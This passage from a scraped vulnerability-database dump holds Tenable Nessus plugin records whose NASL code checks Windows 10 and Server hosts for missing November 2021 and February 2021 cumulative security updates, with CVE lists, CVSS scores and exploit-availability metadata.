"CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42288"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007189.NASL", "href": "https://www.tenable.com/plugins/nessus/154989", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154989);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42288\"\n );\n script_xref(name:\"MSKB\", value:\"5007189\");\n script_xref(name:\"MSFT\", value:\"MS21-5007189\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n\n script_name(english:\"KB5007189: Windows 10 Version 1909 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007189.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42275,\n CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42280, CVE-2021-42283,\n CVE-2021-42285)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42284)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007189\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007189.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007189');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'18363',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007189])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:03:46", "description": "The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601315: Windows 10 Version 1909 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601315.NASL", "href": "https://www.tenable.com/plugins/nessus/146326", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146326);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601315\");\n script_xref(name:\"MSFT\", value:\"MS21-4601315\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601315: Windows 10 Version 1909 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/topic/february-9-2021-kb4601315-os-build-18363-1377-bdd71d2f-6729-e22a-3150-64324e4ab954\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93fc3ad3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601315.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601315');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601315])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-24T15:40:56", "description": "The remote Windows host is missing security update 5007192.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42278, CVE-2021-42280, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007192: Windows 10 Version 1607 and Windows Server 2016 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007192.NASL", "href": "https://www.tenable.com/plugins/nessus/154990", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154990);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007192\");\n script_xref(name:\"MSFT\", value:\"MS21-5007192\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007192: Windows 10 Version 1607 and Windows Server 2016 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007192.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42278, CVE-2021-42280,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007192\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007192.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007192');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'14393',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007192])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:03:16", "description": "The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24078, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601345.NASL", "href": "https://www.tenable.com/plugins/nessus/146337", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146337);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601345\");\n script_xref(name:\"MSFT\", value:\"MS21-4601345\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24078,\n CVE-2021-24081, CVE-2021-24083, CVE-2021-24088,\n CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/office/february-9-2021%e2%80%94kb4601345-os-build-17763-1757-c38b7b85-0d84-d979-1a29-e4ba97b82042?ui=en-US&rs=en-US&ad=US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0231130\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601345.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", 